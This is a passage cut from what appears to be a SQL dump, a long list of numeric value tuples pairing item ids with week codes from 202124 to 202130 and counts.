124',5),(1782,1,'202124',5),(2801,1,'202124',5),(2989,1,'202124',5),(3004,1,'202124',5),(3027,1,'202124',5),(3041,1,'202124',5),(3102,1,'202124',5),(3104,1,'202124',5),(3124,1,'202124',5),(3229,1,'202124',5),(3251,1,'202124',5),(3263,1,'202124',5),(3269,1,'202124',5),(3498,1,'202124',5),(480,1,'202124',6),(484,1,'202124',6),(487,1,'202124',6),(1697,1,'202124',6),(1711,1,'202124',6),(1722,1,'202124',6),(1743,1,'202124',6),(1770,1,'202124',6),(1778,1,'202124',6),(2148,1,'202124',6),(2150,1,'202124',6),(2178,1,'202124',6),(2252,1,'202124',6),(2296,1,'202124',6),(2956,1,'202124',6),(2965,1,'202124',6),(3023,1,'202124',6),(3060,1,'202124',6),(3087,1,'202124',6),(3092,1,'202124',6),(3247,1,'202124',6),(3253,1,'202124',6),(3278,1,'202124',6),(3297,1,'202124',6),(3307,1,'202124',6),(3430,1,'202124',6),(471,1,'202124',7),(1741,1,'202124',7),(1745,1,'202124',7),(1780,1,'202124',7),(2165,1,'202124',7),(2558,1,'202124',7),(2751,1,'202124',7),(2813,1,'202124',7),(2911,1,'202124',7),(3045,1,'202124',7),(3127,1,'202124',7),(469,1,'202124',8),(570,1,'202124',8),(1749,1,'202124',8),(1772,1,'202124',8),(2775,1,'202124',8),(3069,1,'202124',8),(3072,1,'202124',8),(3486,1,'202124',8),(1730,1,'202124',9),(2152,1,'202124',9),(2156,1,'202124',9),(2804,1,'202124',9),(3034,1,'202124',9),(3117,1,'202124',9),(3226,1,'202124',9),(3245,1,'202124',9),(3261,1,'202124',9),(3271,1,'202124',9),(1584,1,'202124',10),(1718,1,'202124',10),(1734,1,'202124',10),(2159,1,'202124',10),(3005,1,'202124',10),(3083,1,'202124',10),(3109,1,'202124',10),(3313,1,'202124',10),(472,1,'202124',11),(1709,1,'202124',11),(470,1,'202124',12),(1544,1,'202124',12),(1610,1,'202124',12),(2154,1,'202124',12),(1766,1,'202124',13),(2809,1,'202124',13),(1596,1,'202124',14),(1612,1,'202124',14),(1728,1,'202124',14),(1774,1,'202124',14),(2617,1,'202124',14),(473,1,'202124',15),(1598,1,'202124',15),(1747,1,'202124',15),(2457,1,'202124',15),(468,1,'202124',16),(1592,1,'202124',16),(1614,1,'202124',16),(2309,1,'202124',16),(2769,1,'202124',16),(3030,1,'202124',16),(3531,1,'202124',16),(335,1,'202124',17),(3285,1,'202124',17),(1608,1,'202124',18),(2503,1,'202124',18),(2609,1,'202124',18),(84,1,'202124',19),(1582,1,'202124',19),(3541,1,'202124',19),(74,1,'202124',20),(108,1,'202124',20),(1588,1,'202124',20),(2297,1,'202124',20),(3287,1,'202124',20),(3534,1,'202124',20),(2904,1,'202124',21),(3282,1,'202124',21),(2704,1,'202124',22),(3710,1,'202124',23),(72,1,'202124',24),(1606,1,'202124',24),(89,1,'202124',25),(76,1,'202124',26),(87,1,'202124',27),(1594,1,'202124',28),(1604,1,'202124',30),(3714,1,'202124',30),(68,1,'202124',35),(1600,1,'202124',35),(1586,1,'202124',43),(91,1,'202124',49),(1602,1,'202124',52),(80,1,'202124',73),(9,1,'202124',486),(110,1,'202125',1),(2156,1,'202125',1),(2965,1,'202125',1),(3096,1,'202125',1),(3249,1,'202125',1),(106,1,'202125',2),(479,1,'202125',2),(481,1,'202125',2),(1768,1,'202125',2),(1780,1,'202125',2),(2063,1,'202125',2),(2558,1,'202125',2),(3104,1,'202125',2),(3257,1,'202125',2),(3269,1,'202125',2),(472,1,'202125',3),(482,1,'202125',3),(484,1,'202125',3),(1584,1,'202125',3),(1697,1,'202125',3),(1699,1,'202125',3),(1715,1,'202125',3),(1734,1,'202125',3),(1743,1,'202125',3),(1745,1,'202125',3),(1770,1,'202125',3),(2165,1,'202125',3),(2658,1,'202125',3),(3023,1,'202125',3),(3090,1,'202125',3),(3117,1,'202125',3),(3253,1,'202125',3),(3259,1,'202125',3),(3261,1,'202125',3),(3265,1,'202125',3),(3273,1,'202125',3),(3275,1,'202125',3),(3313,1,'202125',3),(3489,1,'202125',3),(102,1,'202125',4),(483,1,'202125',4),(485,1,'202125',4),(488,1,'202125',4),(570,1,'202125',4),(1695,1,'202125',4),(1705,1,'202125',4),(1707,1,'202125',4),(1711,1,'202125',4),(1741,1,'202125',4),(1751,1,'202125',4),(1782,1,'202125',4),(2152,1,'202125',4),(2161,1,'202125',4),(2248,1,'202125',4),(2293,1,'202125',4),(2296,1,'202125',4),(2748,1,'202125',4),(2769,1,'202125',4),(2775,1,'202125',4),(2813,1,'202125',4),(2911,1,'202125',4),(2991,1,'202125',4),(3005,1,'202125',4),(3027,1,'202125',4),(3045,1,'202125',4),(3102,1,'202125',4),(3109,1,'202125',4),(3229,1,'202125',4),(3240,1,'202125',4),(3247,1,'202125',4),(3251,1,'202125',4),(3271,1,'202125',4),(3290,1,'202125',4),(3297,1,'202125',4),(3307,1,'202125',4),(3316,1,'202125',4),(3430,1,'202125',4),(3438,1,'202125',4),(3479,1,'202125',4),(3482,1,'202125',4),(469,1,'202125',5),(476,1,'202125',5),(1590,1,'202125',5),(1596,1,'202125',5),(1701,1,'202125',5),(1709,1,'202125',5),(1730,1,'202125',5),(1732,1,'202125',5),(1772,1,'202125',5),(2178,1,'202125',5),(2751,1,'202125',5),(2956,1,'202125',5),(2964,1,'202125',5),(3004,1,'202125',5),(3066,1,'202125',5),(3127,1,'202125',5),(3243,1,'202125',5),(3245,1,'202125',5),(3263,1,'202125',5),(3267,1,'202125',5),(3738,1,'202125',5),(467,1,'202125',6),(471,1,'202125',6),(477,1,'202125',6),(1713,1,'202125',6),(1722,1,'202125',6),(1737,1,'202125',6),(2309,1,'202125',6),(2801,1,'202125',6),(2804,1,'202125',6),(2993,1,'202125',6),(3006,1,'202125',6),(3038,1,'202125',6),(3097,1,'202125',6),(3107,1,'202125',6),(3498,1,'202125',6),(3721,1,'202125',6),(3727,1,'202125',6),(3731,1,'202125',6),(468,1,'202125',7),(1610,1,'202125',7),(1720,1,'202125',7),(1739,1,'202125',7),(1747,1,'202125',7),(1749,1,'202125',7),(1776,1,'202125',7),(2252,1,'202125',7),(3030,1,'202125',7),(3034,1,'202125',7),(3060,1,'202125',7),(3087,1,'202125',7),(3092,1,'202125',7),(3226,1,'202125',7),(486,1,'202125',8),(1604,1,'202125',8),(1703,1,'202125',8),(1726,1,'202125',8),(2989,1,'202125',8),(3069,1,'202125',8),(3079,1,'202125',8),(3280,1,'202125',8),(3486,1,'202125',8),(3724,1,'202125',8),(3742,1,'202125',8),(3749,1,'202125',8),(480,1,'202125',9),(487,1,'202125',9),(1724,1,'202125',9),(1728,1,'202125',9),(1778,1,'202125',9),(2148,1,'202125',9),(2150,1,'202125',9),(2617,1,'202125',9),(3063,1,'202125',9),(3735,1,'202125',9),(3746,1,'202125',9),(1774,1,'202125',10),(2809,1,'202125',10),(3041,1,'202125',10),(470,1,'202125',11),(474,1,'202125',11),(1766,1,'202125',11),(2704,1,'202125',11),(3072,1,'202125',11),(3083,1,'202125',11),(3278,1,'202125',11),(1598,1,'202125',12),(1718,1,'202125',12),(2609,1,'202125',12),(3752,1,'202125',12),(2159,1,'202125',13),(3531,1,'202125',13),(2457,1,'202125',14),(478,1,'202125',15),(1588,1,'202125',15),(1592,1,'202125',15),(473,1,'202125',16),(1612,1,'202125',16),(1614,1,'202125',17),(2154,1,'202125',17),(1608,1,'202125',18),(3534,1,'202125',18),(335,1,'202125',19),(1582,1,'202125',19),(3714,1,'202125',19),(3285,1,'202125',20),(3287,1,'202125',20),(3710,1,'202125',20),(2503,1,'202125',22),(2904,1,'202125',22),(3541,1,'202125',22),(3282,1,'202125',23),(74,1,'202125',24),(84,1,'202125',24),(72,1,'202125',25),(87,1,'202125',25),(1594,1,'202125',25),(2297,1,'202125',25),(89,1,'202125',26),(108,1,'202125',26),(1544,1,'202125',26),(1600,1,'202125',26),(68,1,'202125',29),(1606,1,'202125',29),(76,1,'202125',32),(1586,1,'202125',36),(91,1,'202125',41),(1602,1,'202125',43),(80,1,'202125',60),(9,1,'202125',449),(106,1,'202126',1),(3738,1,'202126',1),(110,1,'202126',2),(3727,1,'202126',2),(3731,1,'202126',2),(1703,1,'202126',3),(1705,1,'202126',3),(1707,1,'202126',3),(1743,1,'202126',3),(1768,1,'202126',3),(3004,1,'202126',3),(3027,1,'202126',3),(3090,1,'202126',3),(3092,1,'202126',3),(3263,1,'202126',3),(3267,1,'202126',3),(3278,1,'202126',3),(3290,1,'202126',3),(3297,1,'202126',3),(3316,1,'202126',3),(3724,1,'202126',3),(481,1,'202126',4),(1711,1,'202126',4),(1713,1,'202126',4),(1751,1,'202126',4),(1776,1,'202126',4),(2150,1,'202126',4),(2252,1,'202126',4),(2965,1,'202126',4),(2993,1,'202126',4),(3034,1,'202126',4),(3041,1,'202126',4),(3097,1,'202126',4),(3117,1,'202126',4),(3249,1,'202126',4),(3257,1,'202126',4),(3261,1,'202126',4),(3265,1,'202126',4),(3269,1,'202126',4),(3430,1,'202126',4),(3438,1,'202126',4),(3735,1,'202126',4),(3752,1,'202126',4),(467,1,'202126',5),(1584,1,'202126',5),(1699,1,'202126',5),(1728,1,'202126',5),(1732,1,'202126',5),(1739,1,'202126',5),(1749,1,'202126',5),(2063,1,'202126',5),(2161,1,'202126',5),(2801,1,'202126',5),(2964,1,'202126',5),(3240,1,'202126',5),(3243,1,'202126',5),(3273,1,'202126',5),(3721,1,'202126',5),(471,1,'202126',6),(474,1,'202126',6),(483,1,'202126',6),(485,1,'202126',6),(1695,1,'202126',6),(1701,1,'202126',6),(1722,1,'202126',6),(1730,1,'202126',6),(1737,1,'202126',6),(2748,1,'202126',6),(3060,1,'202126',6),(3087,1,'202126',6),(3096,1,'202126',6),(3124,1,'202126',6),(3247,1,'202126',6),(3271,1,'202126',6),(3489,1,'202126',6),(477,1,'202126',7),(479,1,'202126',7),(482,1,'202126',7),(486,1,'202126',7),(488,1,'202126',7),(1590,1,'202126',7),(1697,1,'202126',7),(1770,1,'202126',7),(1780,1,'202126',7),(2152,1,'202126',7),(2154,1,'202126',7),(2156,1,'202126',7),(2293,1,'202126',7),(2296,1,'202126',7),(2911,1,'202126',7),(2956,1,'202126',7),(2989,1,'202126',7),(3006,1,'202126',7),(3023,1,'202126',7),(3066,1,'202126',7),(3107,1,'202126',7),(3229,1,'202126',7),(3251,1,'202126',7),(3253,1,'202126',7),(3259,1,'202126',7),(3275,1,'202126',7),(3746,1,'202126',7),(102,1,'202126',8),(470,1,'202126',8),(478,1,'202126',8),(484,1,'202126',8),(1720,1,'202126',8),(1772,1,'202126',8),(1782,1,'202126',8),(2248,1,'202126',8),(2558,1,'202126',8),(2991,1,'202126',8),(3072,1,'202126',8),(3109,1,'202126',8),(3127,1,'202126',8),(3245,1,'202126',8),(3486,1,'202126',8),(3498,1,'202126',8),(3742,1,'202126',8),(469,1,'202126',9),(1741,1,'202126',9),(1745,1,'202126',9),(1747,1,'202126',9),(1774,1,'202126',9),(1778,1,'202126',9),(2165,1,'202126',9),(2178,1,'202126',9),(2617,1,'202126',9),(2751,1,'202126',9),(2775,1,'202126',9),(3005,1,'202126',9),(3038,1,'202126',9),(3079,1,'202126',9),(3280,1,'202126',9),(3313,1,'202126',9),(468,1,'202126',10),(473,1,'202126',10),(480,1,'202126',10),(487,1,'202126',10),(570,1,'202126',10),(1709,1,'202126',10),(1715,1,'202126',10),(1724,1,'202126',10),(1726,1,'202126',10),(1734,1,'202126',10),(3104,1,'202126',10),(3479,1,'202126',10),(3482,1,'202126',10),(3749,1,'202126',10),(2148,1,'202126',11),(2804,1,'202126',11),(3063,1,'202126',11),(472,1,'202126',12),(476,1,'202126',12),(1766,1,'202126',12),(2813,1,'202126',12),(3083,1,'202126',12),(3102,1,'202126',12),(2457,1,'202126',13),(2809,1,'202126',13),(3226,1,'202126',13),(2159,1,'202126',14),(2297,1,'202126',14),(2658,1,'202126',14),(3069,1,'202126',14),(3045,1,'202126',15),(1544,1,'202126',16),(1606,1,'202126',16),(1612,1,'202126',16),(2769,1,'202126',16),(3714,1,'202126',16),(1614,1,'202126',17),(3307,1,'202126',17),(2609,1,'202126',18),(3030,1,'202126',18),(72,1,'202126',19),(74,1,'202126',19),(1598,1,'202126',19),(335,1,'202126',20),(1592,1,'202126',20),(1608,1,'202126',20),(1610,1,'202126',20),(3531,1,'202126',20),(3285,1,'202126',21),(3287,1,'202126',21),(3541,1,'202126',21),(1596,1,'202126',22),(1718,1,'202126',22),(2904,1,'202126',22),(3534,1,'202126',22),(89,1,'202126',23),(84,1,'202126',24),(87,1,'202126',24),(108,1,'202126',24),(2503,1,'202126',24),(3710,1,'202126',25),(1582,1,'202126',26),(3282,1,'202126',26),(1588,1,'202126',28),(2309,1,'202126',28),(76,1,'202126',29),(2704,1,'202126',29),(68,1,'202126',32),(1604,1,'202126',32),(1594,1,'202126',39),(1600,1,'202126',40),(91,1,'202126',49),(1586,1,'202126',53),(1602,1,'202126',67),(80,1,'202126',69),(9,1,'202126',490),(110,1,'202127',1),(478,1,'202127',1),(480,1,'202127',1),(1713,1,'202127',1),(1776,1,'202127',1),(2748,1,'202127',1),(3004,1,'202127',1),(3229,1,'202127',1),(3253,1,'202127',1),(3275,1,'202127',1),(102,1,'202127',2),(481,1,'202127',2),(1695,1,'202127',2),(1707,1,'202127',2),(1722,1,'202127',2),(2991,1,'202127',2),(3006,1,'202127',2),(3066,1,'202127',2),(3097,1,'202127',2),(3249,1,'202127',2),(3721,1,'202127',2),(474,1,'202127',3),(477,1,'202127',3),(482,1,'202127',3),(483,1,'202127',3),(485,1,'202127',3),(1697,1,'202127',3),(1699,1,'202127',3),(1701,1,'202127',3),(1720,1,'202127',3),(1739,1,'202127',3),(1751,1,'202127',3),(1780,1,'202127',3),(2156,1,'202127',3),(2178,1,'202127',3),(2293,1,'202127',3),(2956,1,'202127',3),(2964,1,'202127',3),(3023,1,'202127',3),(3038,1,'202127',3),(3072,1,'202127',3),(3117,1,'202127',3),(3240,1,'202127',3),(3247,1,'202127',3),(3265,1,'202127',3),(3267,1,'202127',3),(3297,1,'202127',3),(3316,1,'202127',3),(3482,1,'202127',3),(3735,1,'202127',3),(471,1,'202127',4),(479,1,'202127',4),(487,1,'202127',4),(1705,1,'202127',4),(1709,1,'202127',4),(1730,1,'202127',4),(1732,1,'202127',4),(1737,1,'202127',4),(1743,1,'202127',4),(1782,1,'202127',4),(2063,1,'202127',4),(2154,1,'202127',4),(2252,1,'202127',4),(2296,1,'202127',4),(2617,1,'202127',4),(3041,1,'202127',4),(3079,1,'202127',4),(3090,1,'202127',4),(3102,1,'202127',4),(3104,1,'202127',4),(3109,1,'202127',4),(3245,1,'202127',4),(3251,1,'202127',4),(3263,1,'202127',4),(3269,1,'202127',4),(3271,1,'202127',4),(3290,1,'202127',4),(3430,1,'202127',4),(3438,1,'202127',4),(3727,1,'202127',4),(3731,1,'202127',4),(3738,1,'202127',4),(3752,1,'202127',4),(476,1,'202127',5),(484,1,'202127',5),(488,1,'202127',5),(1610,1,'202127',5),(1703,1,'202127',5),(1711,1,'202127',5),(1715,1,'202127',5),(1774,1,'202127',5),(2152,1,'202127',5),(2165,1,'202127',5),(2297,1,'202127',5),(2558,1,'202127',5),(2658,1,'202127',5),(2751,1,'202127',5),(2769,1,'202127',5),(2993,1,'202127',5),(3005,1,'202127',5),(3030,1,'202127',5),(3063,1,'202127',5),(3092,1,'202127',5),(3096,1,'202127',5),(3124,1,'202127',5),(3273,1,'202127',5),(3278,1,'202127',5),(3486,1,'202127',5),(3489,1,'202127',5),(3724,1,'202127',5),(3742,1,'202127',5),(3749,1,'202127',5),(72,1,'202127',6),(84,1,'202127',6),(108,1,'202127',6),(467,1,'202127',6),(1584,1,'202127',6),(1590,1,'202127',6),(1734,1,'202127',6),(1741,1,'202127',6),(2161,1,'202127',6),(2775,1,'202127',6),(2804,1,'202127',6),(2911,1,'202127',6),(3045,1,'202127',6),(3069,1,'202127',6),(3087,1,'202127',6),(3243,1,'202127',6),(3282,1,'202127',6),(3285,1,'202127',6),(3287,1,'202127',6),(3479,1,'202127',6),(3541,1,'202127',6),(3714,1,'202127',6),(335,1,'202127',7),(468,1,'202127',7),(470,1,'202127',7),(472,1,'202127',7),(1745,1,'202127',7),(1768,1,'202127',7),(1772,1,'202127',7),(1778,1,'202127',7),(2801,1,'202127',7),(2813,1,'202127',7),(2965,1,'202127',7),(2989,1,'202127',7),(3107,1,'202127',7),(3259,1,'202127',7),(3280,1,'202127',7),(3307,1,'202127',7),(3534,1,'202127',7),(3710,1,'202127',7),(74,1,'202127',8),(1544,1,'202127',8),(1606,1,'202127',8),(1724,1,'202127',8),(1770,1,'202127',8),(2148,1,'202127',8),(2248,1,'202127',8),(2457,1,'202127',8),(3027,1,'202127',8),(3034,1,'202127',8),(3060,1,'202127',8),(3127,1,'202127',8),(3261,1,'202127',8),(3531,1,'202127',8),(3746,1,'202127',8),(87,1,'202127',9),(469,1,'202127',9),(1612,1,'202127',9),(1728,1,'202127',9),(1749,1,'202127',9),(2904,1,'202127',9),(3083,1,'202127',9),(3226,1,'202127',9),(3257,1,'202127',9),(473,1,'202127',10),(570,1,'202127',10),(1718,1,'202127',10),(1747,1,'202127',10),(1766,1,'202127',10),(2150,1,'202127',10),(2809,1,'202127',10),(3313,1,'202127',10),(1726,1,'202127',11),(2503,1,'202127',11),(2609,1,'202127',11),(2704,1,'202127',11),(68,1,'202127',12),(486,1,'202127',12),(1598,1,'202127',12),(76,1,'202127',13),(89,1,'202127',14),(1592,1,'202127',15),(1614,1,'202127',15),(3498,1,'202127',15),(1582,1,'202127',16),(1588,1,'202127',16),(1608,1,'202127',18),(2159,1,'202127',18),(1604,1,'202127',19),(1594,1,'202127',21),(1586,1,'202127',27),(1600,1,'202127',27),(91,1,'202127',30),(2309,1,'202127',30),(1596,1,'202127',31),(1602,1,'202127',40),(80,1,'202127',51),(9,1,'202127',477),(106,1,'202128',1),(110,1,'202128',1),(3041,1,'202128',2),(3269,1,'202128',2),(479,1,'202128',3),(482,1,'202128',3),(1610,1,'202128',3),(1699,1,'202128',3),(2252,1,'202128',3),(2558,1,'202128',3),(2956,1,'202128',3),(3027,1,'202128',3),(3259,1,'202128',3),(3313,1,'202128',3),(3482,1,'202128',3),(481,1,'202128',4),(488,1,'202128',4),(1703,1,'202128',4),(1730,1,'202128',4),(1732,1,'202128',4),(1745,1,'202128',4),(1747,1,'202128',4),(1751,1,'202128',4),(1782,1,'202128',4),(2154,1,'202128',4),(2165,1,'202128',4),(2293,1,'202128',4),(2704,1,'202128',4),(2965,1,'202128',4),(3090,1,'202128',4),(3097,1,'202128',4),(3243,1,'202128',4),(3249,1,'202128',4),(3265,1,'202128',4),(3273,1,'202128',4),(3278,1,'202128',4),(3498,1,'202128',4),(471,1,'202128',5),(476,1,'202128',5),(478,1,'202128',5),(480,1,'202128',5),(1720,1,'202128',5),(1749,1,'202128',5),(1768,1,'202128',5),(2156,1,'202128',5),(2964,1,'202128',5),(2993,1,'202128',5),(3004,1,'202128',5),(3038,1,'202128',5),(3066,1,'202128',5),(3092,1,'202128',5),(3226,1,'202128',5),(3253,1,'202128',5),(3257,1,'202128',5),(3271,1,'202128',5),(3275,1,'202128',5),(3280,1,'202128',5),(3489,1,'202128',5),(467,1,'202128',6),(485,1,'202128',6),(1590,1,'202128',6),(1701,1,'202128',6),(1711,1,'202128',6),(1715,1,'202128',6),(1722,1,'202128',6),(1778,1,'202128',6),(1780,1,'202128',6),(2161,1,'202128',6),(2296,1,'202128',6),(2617,1,'202128',6),(2804,1,'202128',6),(3006,1,'202128',6),(3096,1,'202128',6),(3104,1,'202128',6),(3117,1,'202128',6),(3124,1,'202128',6),(3240,1,'202128',6),(3245,1,'202128',6),(3247,1,'202128',6),(3263,1,'202128',6),(3267,1,'202128',6),(3297,1,'202128',6),(3307,1,'202128',6),(3316,1,'202128',6),(3430,1,'202128',6),(3746,1,'202128',6),(486,1,'202128',7),(487,1,'202128',7),(1707,1,'202128',7),(1713,1,'202128',7),(1737,1,'202128',7),(1743,1,'202128',7),(1772,1,'202128',7),(2150,1,'202128',7),(2748,1,'202128',7),(2911,1,'202128',7),(2991,1,'202128',7),(3079,1,'202128',7),(3102,1,'202128',7),(3127,1,'202128',7),(3229,1,'202128',7),(3721,1,'202128',7),(3727,1,'202128',7),(3738,1,'202128',7),(102,1,'202128',8),(469,1,'202128',8),(470,1,'202128',8),(483,1,'202128',8),(484,1,'202128',8),(1697,1,'202128',8),(1705,1,'202128',8),(2063,1,'202128',8),(2148,1,'202128',8),(2152,1,'202128',8),(2658,1,'202128',8),(2751,1,'202128',8),(2813,1,'202128',8),(2989,1,'202128',8),(3005,1,'202128',8),(3023,1,'202128',8),(3087,1,'202128',8),(3479,1,'202128',8),(477,1,'202128',9),(1592,1,'202128',9),(1614,1,'202128',9),(1726,1,'202128',9),(1734,1,'202128',9),(1776,1,'202128',9),(2178,1,'202128',9),(2297,1,'202128',9),(2769,1,'202128',9),(2775,1,'202128',9),(3072,1,'202128',9),(3724,1,'202128',9),(3752,1,'202128',9),(472,1,'202128',10),(1544,1,'202128',10),(1709,1,'202128',10),(1739,1,'202128',10),(1741,1,'202128',10),(2809,1,'202128',10),(3045,1,'202128',10),(3063,1,'202128',10),(3109,1,'202128',10),(3438,1,'202128',10),(3486,1,'202128',10),(3731,1,'202128',10),(3735,1,'202128',10),(468,1,'202128',11),(1584,1,'202128',11),(1695,1,'202128',11),(1770,1,'202128',11),(2801,1,'202128',11),(3107,1,'202128',11),(3251,1,'202128',11),(3261,1,'202128',11),(3290,1,'202128',11),(3531,1,'202128',11),(3742,1,'202128',11),(74,1,'202128',12),(473,1,'202128',12),(3030,1,'202128',12),(3714,1,'202128',12),(3749,1,'202128',12),(72,1,'202128',13),(474,1,'202128',13),(570,1,'202128',13),(1718,1,'202128',13),(1774,1,'202128',13),(3034,1,'202128',13),(3060,1,'202128',13),(3069,1,'202128',13),(3285,1,'202128',13),(3771,1,'202128',13),(3774,1,'202128',13),(1724,1,'202128',14),(1728,1,'202128',14),(2159,1,'202128',14),(2904,1,'202128',14),(3083,1,'202128',14),(3710,1,'202128',14),(335,1,'202128',15),(1612,1,'202128',15),(2609,1,'202128',15),(3287,1,'202128',15),(3534,1,'202128',15),(1766,1,'202128',16),(3541,1,'202128',16),(2457,1,'202128',17),(108,1,'202128',18),(2248,1,'202128',18),(3777,1,'202128',19),(84,1,'202128',20),(1582,1,'202128',20),(2503,1,'202128',20),(3282,1,'202128',20),(76,1,'202128',21),(87,1,'202128',21),(1588,1,'202128',22),(1596,1,'202128',22),(1600,1,'202128',26),(1604,1,'202128',26),(89,1,'202128',27),(1608,1,'202128',28),(91,1,'202128',29),(1594,1,'202128',29),(1598,1,'202128',29),(1606,1,'202128',29),(2309,1,'202128',34),(68,1,'202128',39),(1586,1,'202128',48),(1602,1,'202128',54),(80,1,'202128',66),(3764,1,'202128',95),(9,1,'202128',486),(102,1,'202129',2),(110,1,'202129',2),(1780,1,'202129',2),(2801,1,'202129',2),(3072,1,'202129',2),(3721,1,'202129',2),(3735,1,'202129',2),(488,1,'202129',3),(1697,1,'202129',3),(1768,1,'202129',3),(2296,1,'202129',3),(2617,1,'202129',3),(2658,1,'202129',3),(2964,1,'202129',3),(2965,1,'202129',3),(3004,1,'202129',3),(3027,1,'202129',3),(3097,1,'202129',3),(3531,1,'202129',3),(3727,1,'202129',3),(3738,1,'202129',3),(3746,1,'202129',3),(471,1,'202129',4),(479,1,'202129',4),(482,1,'202129',4),(483,1,'202129',4),(1590,1,'202129',4),(1703,1,'202129',4),(1713,1,'202129',4),(2152,1,'202129',4),(2165,1,'202129',4),(2293,1,'202129',4),(2993,1,'202129',4),(3066,1,'202129',4),(3087,1,'202129',4),(3117,1,'202129',4),(3124,1,'202129',4),(3127,1,'202129',4),(3247,1,'202129',4),(3280,1,'202129',4),(3297,1,'202129',4),(3438,1,'202129',4),(3489,1,'202129',4),(3714,1,'202129',4),(3752,1,'202129',4),(481,1,'202129',5),(485,1,'202129',5),(1699,1,'202129',5),(1705,1,'202129',5),(1711,1,'202129',5),(1724,1,'202129',5),(1730,1,'202129',5),(1737,1,'202129',5),(1739,1,'202129',5),(1749,1,'202129',5),(1770,1,'202129',5),(1776,1,'202129',5),(2156,1,'202129',5),(2161,1,'202129',5),(2252,1,'202129',5),(2558,1,'202129',5),(2748,1,'202129',5),(3045,1,'202129',5),(3104,1,'202129',5),(3107,1,'202129',5),(3249,1,'202129',5),(3263,1,'202129',5),(3316,1,'202129',5),(3498,1,'202129',5),(480,1,'202129',6),(1695,1,'202129',6),(1715,1,'202129',6),(1720,1,'202129',6),(1722,1,'202129',6),(1732,1,'202129',6),(1743,1,'202129',6),(1774,1,'202129',6),(2751,1,'202129',6),(2911,1,'202129',6),(2956,1,'202129',6),(2991,1,'202129',6),(3006,1,'202129',6),(3060,1,'202129',6),(3096,1,'202129',6),(3102,1,'202129',6),(3109,1,'202129',6),(3226,1,'202129',6),(3253,1,'202129',6),(3267,1,'202129',6),(3269,1,'202129',6),(3271,1,'202129',6),(3273,1,'202129',6),(3278,1,'202129',6),(3287,1,'202129',6),(3541,1,'202129',6),(3731,1,'202129',6),(3771,1,'202129',6),(469,1,'202129',7),(476,1,'202129',7),(478,1,'202129',7),(487,1,'202129',7),(1610,1,'202129',7),(1707,1,'202129',7),(1741,1,'202129',7),(1745,1,'202129',7),(1751,1,'202129',7),(1782,1,'202129',7),(2178,1,'202129',7),(2775,1,'202129',7),(2804,1,'202129',7),(2809,1,'202129',7),(2989,1,'202129',7),(3005,1,'202129',7),(3038,1,'202129',7),(3063,1,'202129',7),(3069,1,'202129',7),(3079,1,'202129',7),(3090,1,'202129',7),(3229,1,'202129',7),(3261,1,'202129',7),(3275,1,'202129',7),(3430,1,'202129',7),(1701,1,'202129',8),(1728,1,'202129',8),(1734,1,'202129',8),(1747,1,'202129',8),(1772,1,'202129',8),(2063,1,'202129',8),(2154,1,'202129',8),(3023,1,'202129',8),(3092,1,'202129',8),(3243,1,'202129',8),(3479,1,'202129',8),(3482,1,'202129',8),(3749,1,'202129',8),(335,1,'202129',9),(484,1,'202129',9),(1614,1,'202129',9),(1778,1,'202129',9),(2297,1,'202129',9),(2813,1,'202129',9),(2904,1,'202129',9),(3041,1,'202129',9),(3245,1,'202129',9),(3257,1,'202129',9),(3265,1,'202129',9),(3285,1,'202129',9),(3724,1,'202129',9),(3742,1,'202129',9),(74,1,'202129',10),(84,1,'202129',10),(108,1,'202129',10),(467,1,'202129',10),(1544,1,'202129',10),(1584,1,'202129',10),(1592,1,'202129',10),(2248,1,'202129',10),(3030,1,'202129',10),(3034,1,'202129',10),(3240,1,'202129',10),(3486,1,'202129',10),(3777,1,'202129',10),(1709,1,'202129',11),(3259,1,'202129',11),(3313,1,'202129',11),(468,1,'202129',12),(473,1,'202129',12),(2148,1,'202129',12),(2609,1,'202129',12),(3083,1,'202129',12),(3251,1,'202129',12),(3282,1,'202129',12),(3290,1,'202129',12),(3534,1,'202129',12),(3710,1,'202129',12),(68,1,'202129',13),(87,1,'202129',13),(486,1,'202129',13),(570,1,'202129',13),(2150,1,'202129',13),(474,1,'202129',14),(1766,1,'202129',14),(2704,1,'202129',14),(3307,1,'202129',14),(470,1,'202129',15),(472,1,'202129',15),(3781,1,'202129',15),(477,1,'202129',16),(1612,1,'202129',16),(1726,1,'202129',16),(2503,1,'202129',16),(2769,1,'202129',16),(1718,1,'202129',18),(2159,1,'202129',18),(2457,1,'202129',18),(3774,1,'202129',18),(1604,1,'202129',19),(1608,1,'202129',19),(72,1,'202129',20),(76,1,'202129',20),(1582,1,'202129',22),(1594,1,'202129',25),(1598,1,'202129',26),(2309,1,'202129',26),(1606,1,'202129',27),(91,1,'202129',29),(1596,1,'202129',29),(1588,1,'202129',30),(3764,1,'202129',30),(1586,1,'202129',31),(1600,1,'202129',31),(89,1,'202129',33),(80,1,'202129',41),(1602,1,'202129',58),(9,1,'202129',472),(110,1,'202130',3),(479,1,'202130',3),(3066,1,'202130',3),(3090,1,'202130',3),(3261,1,'202130',3),(471,1,'202130',4),(480,1,'202130',4),(488,1,'202130',4),(1732,1,'202130',4),(1749,1,'202130',4),(2252,1,'202130',4),(2748,1,'202130',4),(2956,1,'202130',4),(3038,1,'202130',4),(3041,1,'202130',4),(3249,1,'202130',4),(3259,1,'202130',4),(3263,1,'202130',4),(3265,1,'202130',4),(3267,1,'202130',4),(3297,1,'202130',4),(3316,1,'202130',4),(3486,1,'202130',4),(3721,1,'202130',4),(3735,1,'202130',4),(3752,1,'202130',4),(477,1,'202130',5),(483,1,'202130',5),(1711,1,'202130',5),(1715,1,'202130',5),(1745,1,'202130',5),(1782,1,'202130',5),(2152,1,'202130',5),(2296,1,'202130',5),(2991,1,'202130',5),(3006,1,'202130',5),(3124,1,'202130',5),(3229,1,'202130',5),(3247,1,'202130',5),(3271,1,'202130',5),(3275,1,'202130',5),(3430,1,'202130',5),(3482,1,'202130',5),(3727,1,'202130',5),(478,1,'202130',6),(486,1,'202130',6),(1590,1,'202130',6),(1705,1,'202130',6),(1739,1,'202130',6),(1780,1,'202130',6),(2178,1,'202130',6),(2293,1,'202130',6),(3063,1,'202130',6),(3072,1,'202130',6),(3079,1,'202130',6),(3087,1,'202130',6),(3092,1,'202130',6),(3107,1,'202130',6),(3117,1,'202130',6),(3240,1,'202130',6),(3245,1,'202130',6),(3253,1,'202130',6),(3257,1,'202130',6),(3269,1,'202130',6),(3479,1,'202130',6),(3749,1,'202130',6),(102,1,'202130',7),(467,1,'202130',7),(476,1,'202130',7),(482,1,'202130',7),(1737,1,'202130',7),(1741,1,'202130',7),(1743,1,'202130',